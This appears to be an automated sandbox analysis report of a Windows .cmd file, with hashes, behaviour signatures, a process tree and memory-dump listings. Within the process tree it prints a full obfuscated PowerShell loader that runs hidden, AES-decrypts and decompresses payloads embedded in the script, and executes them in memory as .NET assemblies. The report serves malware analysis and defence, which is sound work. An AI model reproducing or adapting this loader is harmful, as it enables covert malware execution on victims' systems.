e5f05bde77f33d504ca63fa3df78fe5d1483306ae488b9ca59d4afa84eb524f0

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
22-03-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$RECYCLE.BIN/$RAH62O0.cmd
Size

111KB
MD5

2c3351c659a42a82e3a3d865c88eaaaf
SHA1

7c73b2c98e449be1c5a85806c08cfe05c0a699ab
SHA256

f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4
SHA512

b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6
SSDEEP

3072:hXiSJ9Nvg6aGNGIR9Lb5ZQ6gvr+sBKWTP8ydL:hnXy2wg9f5ZezrKWTPdV

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2252 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2252 powershell.exe

pid	process
2252	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2252	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1756 wrote to memory of 2272	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 2272	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 2272	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 2256	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 2256	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 2256	1756	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2856	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2856	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2856	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 3068	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 3068	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 3068	2256	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2252	2256	cmd.exe	powershell.exe
PID 2256 wrote to memory of 2252	2256	cmd.exe	powershell.exe
PID 2256 wrote to memory of 2252	2256	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
2⤵
PID:2272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
3⤵
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "
3⤵
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2252-5-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2252-4-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2252-6-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/2252-7-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2252-8-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/2252-9-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2252-11-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2252-10-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2252-12-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/2252-13-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2252-14-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads